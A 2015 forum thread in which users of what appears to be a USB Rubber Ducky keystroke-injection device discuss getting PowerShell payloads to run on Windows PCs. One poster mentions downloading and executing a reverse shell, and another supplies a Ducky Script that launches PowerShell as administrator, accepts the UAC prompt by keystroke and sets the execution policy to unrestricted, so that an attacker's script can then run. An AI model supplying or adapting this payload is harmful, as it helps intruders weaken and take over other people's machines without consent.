Double Negative Posted April 23, 2015 Posted April 23, 2015 Just got my ducky today, but I noticed powershell is disabled on most windows PCs and needs to be enabled, in order to make most of the payloads work. Any payload on doing that quickly? Quote
overwraith Posted April 23, 2015 Posted April 23, 2015 When making my payloads I try to only use the powershell command line interface which on my home computer was enabled by default. What is not enabled is running powershell script files. Which payloads were you referring? Quote
Double Negative Posted April 23, 2015 Author Posted April 23, 2015 Something like a reverse shell is a matter of seconds, if you can just download & execute the script file. Quote
overwraith Posted April 23, 2015 Posted April 23, 2015 I haven't tested this yet, so consider it more pseudo code or a general procedure. This may need some more delays, but you get the picture. Needs an admin computer. If it isn't an admin computer you will need to find a way to escalate privileges. REM *** Initial Delay *** DELAY 2000 REM *** Start Powershell as admin *** GUI STRING powershell MENU REM *** Select Run as administrator *** STRING a REM *** Say yes to UAC *** DELAY 1500 ALT Y DELAY 500 REM *** Actually activating the powershell files *** STRING Set-ExecutionPolicy unrestricted ENTER STRING Y ENTER REM *** Done, insert your call to a .ps file here. *** Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.